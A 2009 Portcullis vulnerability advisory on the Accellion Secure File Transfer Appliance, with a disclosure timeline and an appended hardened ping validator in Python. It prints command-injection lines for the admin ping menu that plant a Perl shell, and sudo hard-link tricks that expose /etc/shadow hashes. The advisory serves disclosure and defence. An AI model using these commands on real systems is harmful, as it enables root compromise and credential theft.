Portcullis Security Advisory - 09-009

Vulnerable System: Accellion Secure File Transfer Appliance

Vulnerability Title: Command Line Interface Is Vulnerable To Privilege Escalation.

Vulnerability Discovery And Development: Portcullis Security Testing Services.

Credit For Discovery: Tim Brown - Portcullis Computer Security Ltd.

Affected systems: All known versions of Secure File Transfer Appliance; the vulnerability discovered was for version FTA_7_0_259.

Details:

Accellion Secure File Transfer Appliance is an appliance-based solution used for receiving and delivering large files. It does this by allowing users to upload and download files via HTTPS. It is generally deployed in a DMZ to allow users access from the local network as well as the Internet. It is based on a customised Red Hat OS running a web application which provides the user interface.

Logging into the appliance via SSH as the admin user results in a locked-down menu shell being run which can be used for administrative purposes. One function it allows is to perform a ping (ICMP echo) request, presumably to debug connectivity issues between the appliance and arbitrary remote hosts. It is possible to pass a value in the host parameter of the ping menu which allows arbitrary commands to be executed, as follows:

    acsh>> |cp cli cli.old
    acsh>> |head -1 cli.old > cli
    acsh>> |printf "while (<>) {\n" >> cli
    acsh>> |printf "system(\$_)\x3b\n" >> cli    # ; is filtered
    acsh>> |printf "}\n" >> cli

The "acsh>>" prompt takes an IP address and concatenates it with the "ping" command before executing it. As you can see in the case above, by escaping the command with a "|" it is possible to execute the arbitrary commands necessary to create a new shell wrapper in Perl. Using the "head" command, we extract the first line from cli.old and overwrite the existing "cli" script with it, preserving the initial permissions on the "cli" binary.
Concatenated to this is a simple Perl loop which reads a line from standard input and executes it via system(). In future, instead of being presented with the menu shell, the Perl will instead execute, allowing the appliance to be explored more fully.

From a normal shell, it was identified that the admin user can run a number of commands as root using sudo. As with the web application, this is intended to allow for the reconfiguration of the appliance, but once more it can be leveraged to execute arbitrary commands as the root user or to otherwise compromise the appliance. Three trivial attacks are outlined below:

1) Using a hard link to "/etc/shadow" combined with the allowed "sudo chmod" of "/home/admin/oldtemp" to get access to the hashes:

    sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
    sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp

Note: Here we are abusing the fact that anyone can create a hard link to a file they do not own, and that, whilst permissions are initially set to be the same as on the parent file, two hard links to the same file can have distinct permissions.

2) Using a hard link to "/etc/shadow" combined with the allowed "sudo cp /etc/admin/temp /etc/mail/sendmail.cf":

    sh-2.05b$ ln /etc/shadow /home/admin/temp
    sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf

Note: In this case, we take advantage of the fact that "sendmail.cf" is world-readable and that "cp" will preserve its permissions.

3) Using sudo "/usr/local/bin/admin.pl" as outlined in the web application advisory:

    sh-2.05b$ sudo /usr/local/bin/admin.pl
    ...

Impact: An attacker may execute malicious code on the target system as the root user.

Exploit: Exploit code is not required.

Vendor Status:

15/06/2009 - Vendor informed via email
03/07/2009 - Vendor advised that they released a software update with version 8_0_105
04/11/2009 - Publication

Copyright: Copyright © Portcullis Computer Security Limited 2009, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
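The following example is added here and is not part of the Portcullis advisory or of the Accellion product; it shows the hardened form of the ping menu function described under Details: the host parameter is checked against a strict allowlist (IP literal or plain hostname) and ping is invoked as an argv list with no shell, so characters such as "|" or ";" are never interpreted. Function names and the ping options are illustrative assumptions.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname label: letters, digits and hyphens, 1-63 characters,
# no leading or trailing hyphen. Nothing else is accepted.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_ping_target(host: str) -> bool:
    """Return True only for a literal IP address or a plain hostname.

    The allowlist excludes every shell metacharacter ('|', ';', '>',
    quotes, whitespace), so a value that passes cannot alter the command
    it is later placed in, however that command is executed.
    """
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)  # accepts IPv4 and IPv6 literals
        return True
    except ValueError:
        pass
    return all(_LABEL.match(label) for label in host.rstrip(".").split("."))


def safe_ping_argv(host: str) -> list:
    """Hardened replacement for a menu that glues raw input onto "ping".

    The advisory's menu concatenated the host string into a shell command.
    Here the input is validated first and then placed in an argv list that
    is handed to the OS without a shell, so no character in it can act as
    a command separator or pipe.
    """
    if not is_valid_ping_target(host):
        raise ValueError("refusing to ping invalid target: %r" % host)
    return ["ping", "-c", "3", host]


def run_ping(host: str) -> int:
    """Run the validated ping and return its exit status (needs a network)."""
    return subprocess.run(safe_ping_argv(host), shell=False).returncode


if __name__ == "__main__":
    # Constructed inputs: a legitimate target and the advisory's injection string.
    for candidate in ("192.0.2.1", "|cp cli cli.old"):
        print(candidate, "->", is_valid_ping_target(candidate))
```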